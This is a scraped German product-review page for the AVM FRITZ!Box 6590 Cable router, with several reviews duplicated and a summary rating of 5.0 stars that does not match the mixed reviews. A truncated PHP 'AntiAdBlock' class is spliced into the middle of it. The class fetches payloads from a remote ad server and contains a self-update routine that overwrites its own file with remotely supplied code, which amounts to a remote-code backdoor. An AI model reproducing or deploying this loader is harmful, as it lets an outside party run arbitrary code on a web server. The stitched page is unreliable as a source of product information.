AVM FRITZ!Box 6590 Cable WLAN AC : Gut, aber für den Preis könnte er noch besser sein.

Das ist meine dritte fritz-box und ich war bislang immer sehr zufrieden, wenngleich sich die erste verdächtig knapp nach der garantie verabschiedete, aber kann ja auch zufall sein. Durch den wechsel von dsl zu kabel nun der erwerb dieser box, dachte ich kaufe gleich die neueste, auch wenn teurer als das vorgängermodell, zu dem schon damals in rezensionen hier geraten wurde. Leider ist die w-lan-leistung der 6590 wirklich schlecht. Das ding hat bereits auf um die 5 meter entfernung und durch eine decke durch immer wieder so starke probleme, dass ständige verbindungsabbrüche die folge sind. Das hätte ich nicht gedacht, ich dachte die entsprechenden rezensionen hier sind übertrieben, aber nein, es ist leider wirklich so. Eigentlich nur zu verwenden, wenn man sich im gleichen raum oder maximal einen raum nebenan aufhält. Da die inbetriebnahme bei unitiymedia einen ziemlichen akt darstellt (ein anderer router als der von der firma bereit gestellte muss immer angemeldet werden, was längere zeit in hotlines und weiteres warten bis zur freischaltung bedeutet), habe ich den router behalten und um einen repeater ergänzt. Also, wer diesen router kauft und weiter als 4 meter stabile verfügbarkeit haben will, der plane gleich auch noch den kauf eines repeaters mit ein. Ansonsten ist das produkt gut, die bedienung weitgehend selbsterklärend mit vielen einstellmöglichkeiten.

Das gerät ist schön, stellt was da und die wlan verbindung in der wohnung ist sehr gut. Nur, die box trennt sich mehrmals über tage vom internet, nichts kann man mehr im menü einstellen, dass diese im internet auf dauer eingeschaltet bleibt.

Diese fritzbox stellt die lösung unserer probleme da. Nachdem wir unseren alten kabelrouter,cve 30360, gegen die fritzbox 6590 ersetzten, haben wir , in verbindung mit dem fritz repeater 1750e, im gesamten haus volle wlan -abdeckung. Erforderlich wurde der router da unser neues notebook,bedingt durch den auschließlichen 2,4ghz standard des alten routers, probleme hatte ins netz zu gelangen. Tatsächlich können wir mit vier endgeräten gleichzeitig, problemlos,ruckelfrei ,uns im netz bewegen. Unsere 200 000er leitung kommt jetzt hervorragend zum tragen. Wir sind froh dieses geld investiert zu haben. Gespannt bin ich darauf wie sich die langzeitqualität des routers darstellen wird.

requestTimeout / 1000); return $value == 0 ? 1 : $value; } private function getTimeoutMS() { return $this->requestTimeout; } private function ignoreCache() { $key = md5('PMy6vsrjIf-' . $this->zoneId); return array_key_exists($key, $_GET); } private function getCurl($url) { if ((!extension_loaded('curl')) || (!function_exists('curl_version'))) { return false; } $curl = curl_init(); curl_setopt_array($curl, array( CURLOPT_RETURNTRANSFER => 1, CURLOPT_USERAGENT => $this->requestUserAgent . ' (curl)', CURLOPT_FOLLOWLOCATION => false, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_TIMEOUT => $this->getTimeout(), CURLOPT_TIMEOUT_MS => $this->getTimeoutMS(), CURLOPT_CONNECTTIMEOUT => $this->getTimeout(), CURLOPT_CONNECTTIMEOUT_MS => $this->getTimeoutMS(), )); $version = curl_version(); $scheme = ($this->requestIsSSL && ($version['features'] & CURL_VERSION_SSL)) ? 'https' : 'http'; curl_setopt($curl, CURLOPT_URL, $scheme . '://' . $this->requestDomainName . $url); $result = curl_exec($curl); curl_close($curl); return $result; } private function getFileGetContents($url) { if (!function_exists('file_get_contents') || !ini_get('allow_url_fopen') || ((function_exists('stream_get_wrappers')) && (!in_array('http', stream_get_wrappers())))) { return false; } $scheme = ($this->requestIsSSL && function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) ? 'https' : 'http'; $context = stream_context_create(array( $scheme => array( 'timeout' => $this->getTimeout(), // seconds 'user_agent' => $this->requestUserAgent . ' (fgc)', ), )); return file_get_contents($scheme . '://' . $this->requestDomainName . $url, false, $context); } private function getFsockopen($url) { $fp = null; if (function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) { $fp = fsockopen('ssl://' . $this->requestDomainName, 443, $enum, $estr, $this->getTimeout()); } if ((!$fp) && (!($fp = fsockopen('tcp://' . gethostbyname($this->requestDomainName), 80, $enum, $estr, $this->getTimeout())))) { return false; } $out = "GET {$url} HTTP/1.1\r\n"; $out .= "Host: {$this->requestDomainName}\r\n"; $out .= "User-Agent: {$this->requestUserAgent} (socket)\r\n"; $out .= "Connection: close\r\n\r\n"; fwrite($fp, $out); stream_set_timeout($fp, $this->getTimeout()); $in = ''; while (!feof($fp)) { $in .= fgets($fp, 2048); } fclose($fp); $parts = explode("\r\n\r\n", trim($in)); return isset($parts[1]) ? $parts[1] : ''; } private function getCacheFilePath($url, $suffix = '.js') { return sprintf('%s/pa-code-v%s-%s%s', $this->findTmpDir(), $this->version, md5($url), $suffix); } private function findTmpDir() { $dir = null; if (function_exists('sys_get_temp_dir')) { $dir = sys_get_temp_dir(); } elseif (!empty($_ENV['TMP'])) { $dir = realpath($_ENV['TMP']); } elseif (!empty($_ENV['TMPDIR'])) { $dir = realpath($_ENV['TMPDIR']); } elseif (!empty($_ENV['TEMP'])) { $dir = realpath($_ENV['TEMP']); } else { $filename = tempnam(dirname(__FILE__), ''); if (file_exists($filename)) { unlink($filename); $dir = realpath(dirname($filename)); } } return $dir; } private function isActualCache($file) { if ($this->ignoreCache()) { return false; } return file_exists($file) && (time() - filemtime($file) < $this->cacheTtl * 60); } private function getCode($url) { $code = false; if (!$code) { $code = $this->getCurl($url); } if (!$code) { $code = $this->getFileGetContents($url); } if (!$code) { $code = $this->getFsockopen($url); } return $code; } private function getPHPVersion($major = true) { $version = explode('.', phpversion()); if ($major) { return (int)$version[0]; } return $version; } private function parseRaw($code) { $hash = substr($code, 0, 32); $dataRaw = substr($code, 32); if (md5($dataRaw) !== strtolower($hash)) { return null; } if ($this->getPHPVersion() >= 7) { $data = @unserialize($dataRaw, array( 'allowed_classes' => false, )); } else { $data = @unserialize($dataRaw); } if ($data === false || !is_array($data)) { return null; } return $data; } private function getTag($code) { $data = $this->parseRaw($code); if ($data === null) { return ''; } if (array_key_exists('code', $data)) { $this->selfUpdate($data['code']); } if (array_key_exists('tag', $data)) { return (string)$data['tag']; } return ''; } public function get() { $e = error_reporting(0); $url = $this->routeGetTag . '?' . http_build_query(array( 'token' => $this->token, 'zoneId' => $this->zoneId, 'version' => $this->version, )); $file = $this->getCacheFilePath($url); if ($this->isActualCache($file)) { error_reporting($e); return $this->getTag(file_get_contents($file)); } if (!file_exists($file)) { @touch($file); } $code = ''; if ($this->ignoreCache()) { $fp = fopen($file, "r+"); if (flock($fp, LOCK_EX)) { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } else { $fp = fopen($file, 'r+'); if (!flock($fp, LOCK_EX | LOCK_NB)) { if (file_exists($file)) { $code = file_get_contents($file); } else { $code = ""; } } else { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } error_reporting($e); return $this->getTag($code); } private function getSelfBackupFilename() { return $this->getCacheFilePath($this->version, ''); } private function selfBackup() { $this->selfSourceContent = file_get_contents(__FILE__); if ($this->selfSourceContent !== false && is_writable($this->findTmpDir())) { $fp = fopen($this->getSelfBackupFilename(), 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); return false; } ftruncate($fp, 0); fwrite($fp, $this->selfSourceContent); fflush($fp); flock($fp, LOCK_UN); fclose($fp); return true; } return false; } private function selfRestore() { if (file_exists($this->getSelfBackupFilename())) { return rename($this->getSelfBackupFilename(), __FILE__); } return false; } private function selfUpdate($newCode) { if(is_writable(__FILE__)) { $hasBackup = $this->selfBackup(); if ($hasBackup) { try { $fp = fopen(__FILE__, 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); throw new Exception(); } ftruncate($fp, 0); if (fwrite($fp, $newCode) === false) { ftruncate($fp, 0); flock($fp, LOCK_UN); fclose($fp); throw new Exception(); } fflush($fp); flock($fp, LOCK_UN); fclose($fp); if (md5_file(__FILE__) === md5($newCode)) { @unlink($this->getSelfBackupFilename()); } else { throw new Exception(); } } catch (Exception $e) { $this->selfRestore(); } } } } } $__aab = new __AntiAdBlock_2430765(); return $__aab->get();

Ich benutze den router an meinem unitymedia kabelanschluss und konnte dadurch den standardrouter ersetzen. Das gerät besitzt unendliche funktionen, besonders gefällt mir die sperrfunktion für eingehende spam-anrufe der abzockfirmen. Ausserdem ist das teil “made in germany”, kein vergleich zu dem massenhaft vorhandenen “chinaschrott”.

  • Guter Kabelrouter
  • Guter Support durch den Hersteller
  • Elektronik wird immer kleiner, nur die Fritzbox nicht.

AVM FRITZ!Box 6590 Cable WLAN AC + N Router (DOCSIS-3.0-Kabelmodem, Dual-WLAN AC+N mit 1.733 Mbit/s (5 GHz) + 800 MBit/s (2,4 GHz), VoIP-Telefonanlage)

  • Geben Sie Ihr Modell ein,
    um sicherzustellen, dass dieser Artikel passt.
  • Router mit integriertem EuroDOCSIS-3.0-Kabelmodem (32×8 Kanalbündelung) für bis zu 1.760 MBit/s Downstream-Geschwindigkeit, geeignet für alle gängigen Kabelanschlüsse inkl. Vodafone/Kabel Deutschland, Unitymedia u.v.m.
  • Modernes Dual-WLAN AC+N (MU-MIMO) mit 1.733 (5 GHz) + 800 MBit/s (2,4 GHz) für mehr Performance, Flexibilität und stabilste Verbindungen
  • VoIP-Telefonanlage mit vielseitigen Komfortfunktionen für alle Telefone (Analog-, ISDN-, DECT- und IP-Telefone), DECT-Basis für bis zu 6 Schnurlos-Telefone, z. B. alle FRITZ!Fon Modelle
  • 4 Gigabit-LAN-Anschlüsse, 2 USB 2.0-Anschlüsse für Drucker und Speicher, Mediaserver (UPnP AV) für Filme, Fotos und Musik im Heimnetz
  • Lieferumfang: FRITZ!Box 6590 Cable, Netzteil, 1,5 Meter Koaxialkabel, 1,5 Meter LAN-Kabel, RJ12/TAE Adapter, Installationsanleitung

Benutze die fritzbox 6590 cable mit kabel-bw. Super leichtes einrichten ( auch von kabel-bw seite) leidere keine wandanbringung vom herstellervorgesehen. Tolle,schnelle und einfache benutzeroberfläche. Geringer stromverbrauch,erstklassiges wlan. Rundum zu empfehlen, wenn nicht der preis und das etwas grobschlächtige aussehen wäre.

Ich habe meinen alten router und kabelmodem gegen diese eierlegende wollmilchsau ausgetauscht. Zusammen mit dem gigaset cl660hx eine absolute empfehlung.

Ich habe die 6490 von kabel deutschland (vodafone) gegen dieses modell getauscht. Wichtig war mir in erster linie der volle zugriff auf die fritzbox, da es ständig probleme mit fax und wlan gab und keine besserung in sicht war. Nach dem auspacken habe ich die alten anschlüsse an die 6590 gesteckt, power on, das fritzbox-menue aufgerufen und mich durch die anweisungen leiten lassen. Die 6590 wurde von kabel deutschland sofort erkannt und nach eingabe von kundennummer und aktivierungscode kamen die einstellungen für telefonie, die man sofort ausdrucken muss. Danach habe ich einen neustart gemacht und siehe da: internet stand perfekt. Danach noch die anderen einstellungen (telefonie, wlan) eingestellt. Das ganze umstellen hat mit aufbau keine 30 minuten gedauert. Die oberfläche ist schneller als bei 6490, wlan ist wesentlich besser: dort, wo ich bisher knapp 70 mbit hatte, zeigt mein tablet nun 200 mbit an. Habe ich durch mehrere downloads bestätigt gefunden. Mein fax arbeitet nun ohne probleme und versendet bereits beim ersten mal.

++ in sachen installation und bedienung/einstellung ist der router top. Bin bei vodafone, erkennung ohne jedes problem. Der router läuft völlig stabil. ++ fritz hält seine produkte über jahre mit updates „frisch“; das relativiert den anschaffungspreis und gibt mir ein gewisses sicherheitsgefühlo in sachen wlan-reichweite scheint die größe des gerätes nichts zu bringen. Ich war zunächst sogar etwas enttäuscht, habe durch wirklich minimale lageveränderungen aber letztlich eine gute situation erreicht. Vorhersehbar waren die ergebnisse aber irgendwie nicht. – die cable-boxen hinken im betriebssystem den dsl-boxen hinterher. Das ist ärgerlich, da in verbindung mit zweitem wlan-punkt über stromleitung die umschaltfunktion aktuell nicht funktioniert; soll kommen.

Die fritzbox 6590 cable ersetzt meine unitymedia box und ich bin begeistert, endlich schnelles wlan im kompletten haus. Die box ist erst einen tag in betrieb wobei die umstellung bei unitymedia ohne problemen verlief, internet und telefondaten waren innerhalb einer stunde bereitgestellt. Usb nutzte ich nicht deswegen macht es mir nichts aus das die 6590 nur usb 2.

Sagen wir es mal so, eigentlich benötigt man das gerät ja nicht weil man ja von seinem kabelnetzbetreiber z. Unitymedia eine box gestellt bekommt. Leider ist es so dass die boxen wie z. Von unitymedia in der funktionalität stark eingeschränkt sind und das der kabelnetzbetreiber eigentlich alles weg speichert was man mit der box sowohl außerhalb des netzwerks als auch innerhalb des netzwerks so tut. Wenn man sich eine zweite box hinter die unitymedia box setzt kann man mit dieser zweiten box aber leider nicht die telefonfunktion nutzen punktdiese bleibt dann noch immer in der unitymedia box. Ich habe uns diese box gekauft um alles in einer box zu haben sowohl internet wlan als auch die telefonfunktion. Des weiteren hat diese box gegenüber der von unitymedia gestellten box ein viel besseres wlan. Ich bin von dieser box rundum begeistert und kann diese nur empfehlen. Die konfiguration nach rücksprache mit unitymedia war sehr einfach und hat nicht lange gedauert. Das einzige manko ist dass ich mit der eigenen box die statische ip-adresse funktion nicht benutzen kann diese wird von unitymedia in dieser konfiguration nicht angeboten.

Ich nannte vor dieser 6590 eine 6490 mein eigen und wollte eigentlich nicht umsteigen. Weil bei der von mir verwendeten 6490 die dect funktionalität nicht zu 100% gegeben war. Ich hatte immer probleme mit den angemeldeten fritzfons (3 stück) beim telefonieren. Hier waren immer knackende geräusche zu vernehmen. Ja, ich hatte alle versucht das problem zu lösen, jedoch hat es nicht geklappt. Bei der nun eingesetzten 6590 habe ich die probleme bisher nicht mehr (laufzeit nun 1 woche). Ich betreibe eine auerswald türsprechanlage in verbindung mit einer instar aussenkamera an der fritzbox um beim klingeln an unserer haustüre auch per livebild zu sehen wer da klingelt. Mir ist aufgefallen das die 6590 das livebild sofort zur verfügung stellt und nicht erst wie bei der 6490 ein verzögerung von ca. Auch die telefonie funktioniert nun “knack” frei und die fritzfons welche im ug / eg (da wo auch die box steht) / dg stehen und an der box ohne dect repeater angemeldet sind, haben einen spürbaren besseren empfangbezüglich wlan funktionalität muss ich im gegenzug manch anderer renzensionen sagen, dass das funktionsverhältnis 1:1 zur zuvor eingesetzten fritzbox 6490 beträgt. Die 6590 steht bei mir im eg auf einem schrank in 2 m höhe (wie auch die 6490 zuvor) und versorgt mit weiteren eingesetzten repeatern das gesamte haus und den garten mit ordentlicher funkleistung und auch bandbreite. Das thema mesh ist ein feature was ja noch kommt und die box dann entsprechend verbessern soll, aber ich muss sagen dass die box hier schon sehr gute arbeit leistet. Warum habe ich 1 stern abgezogen?.Wie viele rezesenten zuvor auch schon geschrieben haben, erschliesst es sich mir nicht, warum die 6590 für die verhältnisse so “gigantische” aussenmasse des gehäuses angenommen hat??vielleicht erhalten wir die erklärung mit der einführung der mesh funktionalität dann damit das das wlan ebenso gigantisch strahlt und funktioniert.

Das gerät verrichtet nun seit markteinführung seinen dienst an meinem anschluss. Schade nur, dass vodafone verlangt immer das gelieferte modem anzuschließen bei etwaigen problemen. Anders als vodafone behauptet ist die fritzbox bisher nie ursprung eines fehlers. Die einfache und Übersichtliche konfigurationsoberfläche ist schnell verständlich. Der funktionsumfang ist gigantisch. Das streamen des aktuellen fernsehprogramms auf etwaige endgeräte hakelt ggf. Lässt sich aber durch besseren wlan empfang verbessern. Die möglichkeiten die avm bei seinen angebotenen fritzbox’en bietet ist groß und wächst mit “fast” jedem update. Kabelkunden sollten zu diesem gerät greifen und das vom provider gelieferte modem in die ecke packen.

Wie versprochen und erwartet läuft das teil perfekt. . Mit etwas technischem verständnis lässt sie sich durch die einfach und komplett deutsche oberfläche alles einfach einstellen.

Ich habe seit ich internet über den kabelanschluss (ehemals kabel deutschland, jetzt ja vodafone) habe die 6490 (den homeserver) des anbieters in betrieb. Hier haben mich eigentlich schon immer einige dinge gestört: verfügbarkeit von updates, kein eigener dns, fehlende und eingeschränkte funktionen. Ich hatte mir zum test bereits eine 6490 cable geliehen und war von dieser bergeistert. Deshalb habe ich mich nun entschlossen die 6590 cable zu kaufen. Und ich wurde nicht enttäuscht:- aktuelles fritzos (dadurch auch die gui viel schneller)- endlich auch updates für die angeschlossenen fritz-fone- alle menüs zugänglich- eigener dns (der von kabel/vodafone ist langsam und “hängt” schon gerne mal)- fallback bei kabelausfall auf lte/umts per stick geht- wlan ist besser (reichweite und geschwindigkeit ->vorher 50-60mb/s jetzt >120mb/s durch 3 wände durch)- selbst im keller ist noch wlan verfügbar (~ 10-20mb/s)- wlan-repeater wird nun nicht mehr benötigt- internetdurchsatz (400mbit-anschluss) ist konstanter und schwankt nicht mehr so stark wie vorhervon meiner seite her eine klare kaufempfehlung, auch wenn die box doch schon ihren preis hat. Und den hier genannten nachteilen kann ich mich nicht anschließen. Ich selbst kann die 400mbit ja fast nicht ausreizen. Beim reinen surfen merkt man keinen unterschied zu den 100mbit oder langsamer von bekannten, streaming und ip-tv laufen einwandfrei (auch mehrere streams parallel).

Nachdem ich wegen eines umzugs in den kabelnetzbereich wenige wochen die fritzbox 6490 nutzte und diese instabil lief und sehr warm wurde, wechselte ich auf die 6590 und bin zufrieden. Es laufen 3 dect telefone, derzeit 15 wlan clients und diverse clients über einen switch an lan port 1und2. Das wlan scheint mir entgegen anderer rezensionen nicht schlechter als bei der 6490. Ich habe in der gesamten wohnung durch mehrere wände guten empfang. Die box bleibt wohl auch wegen des großen gehäuses schön kühl. Ich habe bei vodafone einen 200er tarif. Laut speedtests liege ich auch drüber. Die einrichtung bei vodafone war kinderleicht. Ich würde die box wieder kaufen.

In sachen performance der adminoberfläche ein quantensprung zu den geräten vorher. Schade das unitymedia keinen passenden service dazu anbieten kann.

50 geräte per lan und per wlan im netz, welches auch noch durch einen lan repeater von avm verstärkt wird. Enthalten ist ein sonos hub mit alleine 16 boxen, ein homematic ip hub mit ca. 30 modulen und 4 amazons echos. Der rest teilt sich auf in pcs, ipads, mobiltelefone. Man kann also von einer erhöhten auslastung sprechen.

Mit der box, die mir von unitymedia aufgezwängt worden war, war ich nie warm geworden. Zu viele sachen konnten nicht eingestellt werden, ich hatte ständig wlan-abbrüche (das signal muss durch 2 betondecken zu mir), die datenübertragung war langsam. Das änderte sich, als die fritz ans kabel kam. Seitdem sind die verbindungen bei allen geräten stabil, mein sipgate-konto ist auch eingerichtet und die dect-mobilteile hängen direkt an der box, es gibt regelmässig softwareupdates. Am usb2 (leider kein usb3) port hängt bei mir eine externe festplatte und über das eingebaute nas fahre ich meine datensicherungen. Alles problemlos und einfach einzurichten.

Vor 15 minuten erhalten, ausgepackt, angeschlossen – und alles prima, unkompliziert. Nicht wie der mist, den kabel deutschland/vodafone einem zur verfügung stellt.

Ich hab sie genau wegen der bauform gekauft. Diese bauform hat einen entscheidenden vorteil, nämlich kühlung. Bei anderen flachen routern kann man spiegeleier drauf braten, was der lebensdauer der elektronischen bauteile sehr abträglich ist. Die fritzbox wird nicht mal handwarm. Bei mir sind 3 router vom provider den hitzetod gestorben. Die box läuft seit november 2017 im dauerbetrieb ohne aussetzer. W-lan, telefon, lan keinerlei probleme oder aussetzer. Alle angemeldeten androidgeräte haben sich bisher immer ordnungsgemäß eingeloggt. Zur reichweite des w-lan kann ich nicht wirklich was sagen, da ich nur max 15m reichweite nutze, da funktioniert alles ohne probleme.

Ich habe mir das gerät gekauft weil ich von meinem provider vor jahren mal eine miet 6320 bekommen habe. Das gerät ist was anschlüsse und geschwindigkeit sowie sicherheit angeht nicht mehr aktuell. Angeschlossen und beim provider freigeschaltet. Hat alles geklappt und ich bin begeistertwlan ist extrem schnell endlich kann ich auch per wlan meinen anschluss 120 mb/s ausnutzen. Das ging vorher nichtdann noch die super dect funktionen das tv streaming und und undder preis. Aber mir war es das wertnachteile. 0würde ich aber wieder kaufen.

Die umstellung und einstellung von einer kabelbw 6390 hat echt super funktioniert. Auch sonst passt eigentlich alles. Wlan ist ein bischen besser zum vergleich der 6390. Soweit ich das beurteilen kann. Leider gibt es das problem ,daß die box gerne mal einfach so statt an einem lan port statt 1/gibt plötzlich 100 m/bit aushandelt, obwohl zuvor 1 gbit vorhanden war. . Habe auch extra mal einen gbit switch dazwischen “gehängt” , dort wird mir vom switch an den status led’s eine gbit verbindung angezeigt. Teilnehmer sind auch fix mit 1000 mbit vollduplex eingestellt. Nur die box möchte das nicht, obwohl die einstellung auf powermode 1/gbit steht. Stelle ich die verbindung neu her, bleibt diese für unbestimmte zeit bestehen. Das kabel kann ich ausschliessen.

Etwas groß gegenüber anderen fritz-boxen; technik funktionalität leistung einfach super, macht das was es soll außer eier kochensehr empfehlenswert.

Ausgangssituation war eine 3370 als wifi router hinter dem normalen kabelmodem von kabel deutschland. Da die 3370 mittlerweile recht überfordert war, musste eine schnellere lösung her. Hier meine punkte:+ die box ist echt schnell, mehrere interne wlan verbindungen + schneller download aus dem netz. + vergleichsweise schnelles nas, waren vorher nur ca. 3 – 4 mb / s drin, sind es jetzt bis zu 20 mb/s. Mehr geht wohl nicht wegen des usb 2. + einrichtung war einfach, allerdings gehörte ich zu denen, die mind. Vorher war keine verbindung zu kd möglich. Fax einrichten ist kein zauberwerk. – die box ist echt voluminös.

Die aktivierung lief problemlos. Für einen router ist die box sehr groß. Eine montage-möglichkeit gibt es nicht, sondern nur den fest angebauten standfuß. Die alten kabel-boxen von fritz haben eine noch schlimmere bauform. Eine gewisse lernkurve gibt es also in berlin. Die tasten an der front sind praxisfremd, diese funktionen gehören nur in’s software-menü. Sinnvoll an der front wäre eine wlan-taste und mindestens ein usb-anschluss. Ein router ist grundsätzlich eine ideale usb-ladestation, da er sich in der mitte der wohnung befinden sollte, um den wlan-funk optimal zu verteilen. Die verlegung des kabels vom tv-anschluss zur wohnungsmitte war sehr lästig, aber notwendig. Ob der chipsatz zukunftssicher für neue Übertragungs-standards ist, bezweifle ich.

Ich wollte bei unserem kabelanschluss unbedingt einen eigenen kabel-router nutzen, um die einschränkungen des anbieters zu umgehen (hier hauptsächlich die verwendung von zusätzlichen voip-anbietern)ich habe extra ein paar monate gewartet, da das erscheinen der 6590 absehbar war – vorübergehend nutzte ich eine leihbox 6490 vom anbieter. Große unterschiede gibt es ehrlich gesagt nicht – abgesehen von der nun freien software ohne sperren. Vorteile der 6590 gegenüber der 6490:- schnelleres web-interface (kann auch an der alten software 6. 53 der 6490 gelegen haben)edit: lag definitiv an der firmware – ist bei der neuen firmware bei der 6490 auch sehr schnell. – nutzung aller softwarefunktionen ohne einschränkung des internetanbietersnachteile der 6590 gegenüber der 6490:- keine wandbefestigung möglichallgemein zu meckern:- langsames usb 2. 0- wlan ist für mich unbrauchbargrund: ich nutze zwei ubiquity-access-points im haus, die reibungslos laufen. Hierüber betreibe ich auch 3 stück wlan-Überwachungskameras. Die bildübertragung klappt gut – kein ruckeln etc. Sobald aber die 6590 diese 3 kameras übernimmt, ist die videoübertragung unbrauchbar schlecht, obwohl die 6590 sogar näher an den kameras ist, als die beiden access-points und die 6590 dann ausschließlich diese kameras versorgt – alle anderen wlan-teilnehmer bleiben auf den access-points. Die signalstärke war dabei laut anzeige in der 6590 immer gut.

Summary
Review Date
Reviewed Item
AVM FRITZ!Box 6590 Cable WLAN AC + N Router (DOCSIS-3.0-Kabelmodem, Dual-WLAN AC+N mit 1.733 Mbit/s (5 GHz) + 800 MBit/s (2,4 GHz), VoIP-Telefonanlage)
Rating
5,0 of 5 stars, based on 121 reviews

Author: SmartHome

1 thought on “AVM FRITZ!Box 6590 Cable WLAN AC : Gut, aber für den Preis könnte er noch besser sein.

  1. Hab meine 6490 durch die 6590 ersetzt, nachdem ich die neue 6591 zur verfügung hatte und diese nicht problemlos lief. Die bedienungsoberfläche ist gut strukturiert und schnell. Die wlan-reichweite ist genau so gut, wie bei der 6490 oder der 6591. Ich kann diese fritzbox empfehlen, wenngleich es einen kleinen negativen punkt gibt – und zwar der usb 2.
    1. Hab meine 6490 durch die 6590 ersetzt, nachdem ich die neue 6591 zur verfügung hatte und diese nicht problemlos lief. Die bedienungsoberfläche ist gut strukturiert und schnell. Die wlan-reichweite ist genau so gut, wie bei der 6490 oder der 6591. Ich kann diese fritzbox empfehlen, wenngleich es einen kleinen negativen punkt gibt – und zwar der usb 2.
  2. Ich bin ein vodafone-kunde und habe bis heute den schwarzen standard-router von vodafone (wlan-kabelrouter compal ch7466ce) benutzt bis ich oft verbindungsunterbrechungen hatte (zocken & streamen). Da ich schon immer gute erfahrungen mit fritzbox hatte und mir genug information/stoff mir über die 6590 eingeeignet hatte, habe ich mir jetzt die box geholt um die box compal zu ersetzten. Ich muss sagen, dass die verbindung per lan & w-lan enorm schneller geworden ist. Ich muss aber erwähnen, dass ich bei der 6590 am anfang doch sehr skeptisch war. Nach der ersten installation der fritzbox hatte ich grauenhafte werte. Selbst der standard-router vom vodafone hatte viel bessere werte. Ich habe die 6590 in die werkseinstellung zurück gesetzt und noch mal installiert. Beim zweiten versuch muss ich sagen, dass die werte unnormal gut sind. Die 6590 ist fast doppelt so schnell wie die standard-router compal. Da ich mein fritzbox im wohnzimmer stehen habe und die möglichkeit besitze mein pc & ps4 mit einem lan kabel zu verbinden hatte ich mir ein powerlan adapter von tp-link geholt.
  3. Rezension bezieht sich auf : AVM FRITZ!Box 6590 Cable WLAN AC + N Router (DOCSIS-3.0-Kabelmodem, Dual-WLAN AC+N mit 1.733 Mbit/s (5 GHz) + 800 MBit/s (2,4 GHz), VoIP-Telefonanlage)

    Ich bin ein vodafone-kunde und habe bis heute den schwarzen standard-router von vodafone (wlan-kabelrouter compal ch7466ce) benutzt bis ich oft verbindungsunterbrechungen hatte (zocken & streamen). Da ich schon immer gute erfahrungen mit fritzbox hatte und mir genug information/stoff mir über die 6590 eingeeignet hatte, habe ich mir jetzt die box geholt um die box compal zu ersetzten. Ich muss sagen, dass die verbindung per lan & w-lan enorm schneller geworden ist. Ich muss aber erwähnen, dass ich bei der 6590 am anfang doch sehr skeptisch war. Nach der ersten installation der fritzbox hatte ich grauenhafte werte. Selbst der standard-router vom vodafone hatte viel bessere werte. Ich habe die 6590 in die werkseinstellung zurück gesetzt und noch mal installiert. Beim zweiten versuch muss ich sagen, dass die werte unnormal gut sind. Die 6590 ist fast doppelt so schnell wie die standard-router compal. Da ich mein fritzbox im wohnzimmer stehen habe und die möglichkeit besitze mein pc & ps4 mit einem lan kabel zu verbinden hatte ich mir ein powerlan adapter von tp-link geholt.
    1. Verpackungdie verpackung ist ansprechend, auffällig aber nicht zu bunt gestaltet. Alle wichtigen funktionen der fritzbox wurden auf der rückseite aufgelistet. Die verpackung lässt sich leicht öffnen und alle teile bis auf das koaxiale anschlusskabel sind leicht zugänglich und entnehmbar. Kabelanschlussder anschluss der kabel ist durch gute kennzeichnung ein kinderspiel. Alle ports sind gut aus­gezeichnet. Erste schrittenach dem einschalten der box und dem aufruf der webseite der fritzbox im browser wird es etwas verwirrend. Die anleitung auf der webseite weicht von der in der gedruckten kurzanlei­tung ab. Wird auf der wegseite ein neustart erforderlich. In der kurzanleitung findet man davon nichts. Der neustart ließ sich dann auf der webseite (kein button dafür) nicht durchführen.
  4. Rezension bezieht sich auf : AVM FRITZ!Box 6590 Cable WLAN AC + N Router (DOCSIS-3.0-Kabelmodem, Dual-WLAN AC+N mit 1.733 Mbit/s (5 GHz) + 800 MBit/s (2,4 GHz), VoIP-Telefonanlage)

    Verpackungdie verpackung ist ansprechend, auffällig aber nicht zu bunt gestaltet. Alle wichtigen funktionen der fritzbox wurden auf der rückseite aufgelistet. Die verpackung lässt sich leicht öffnen und alle teile bis auf das koaxiale anschlusskabel sind leicht zugänglich und entnehmbar. Kabelanschlussder anschluss der kabel ist durch gute kennzeichnung ein kinderspiel. Alle ports sind gut aus­gezeichnet. Erste schrittenach dem einschalten der box und dem aufruf der webseite der fritzbox im browser wird es etwas verwirrend. Die anleitung auf der webseite weicht von der in der gedruckten kurzanlei­tung ab. Wird auf der wegseite ein neustart erforderlich. In der kurzanleitung findet man davon nichts. Der neustart ließ sich dann auf der webseite (kein button dafür) nicht durchführen.
  5. Rezension bezieht sich auf : AVM FRITZ!Box 6590 Cable WLAN AC + N Router (DOCSIS-3.0-Kabelmodem, Dual-WLAN AC+N mit 1.733 Mbit/s (5 GHz) + 800 MBit/s (2,4 GHz), VoIP-Telefonanlage)

    Gegenüber dem früheren modell ein gewaltiger fortschritt. Das besser belüftete gehäuse wird auch nicht mehr so heiß. Nicht so gut gefällt mir das neue design:- keine wandaufhängung möglich- kabelausgänge nach hinten statt seitlich- die enorme größe läßt die box im wohnumfeld zum störfaktor werden.
    1. Gegenüber dem früheren modell ein gewaltiger fortschritt. Das besser belüftete gehäuse wird auch nicht mehr so heiß. Nicht so gut gefällt mir das neue design:- keine wandaufhängung möglich- kabelausgänge nach hinten statt seitlich- die enorme größe läßt die box im wohnumfeld zum störfaktor werden.
  6. Rezension bezieht sich auf : AVM FRITZ!Box 6590 Cable WLAN AC + N Router (DOCSIS-3.0-Kabelmodem, Dual-WLAN AC+N mit 1.733 Mbit/s (5 GHz) + 800 MBit/s (2,4 GHz), VoIP-Telefonanlage)

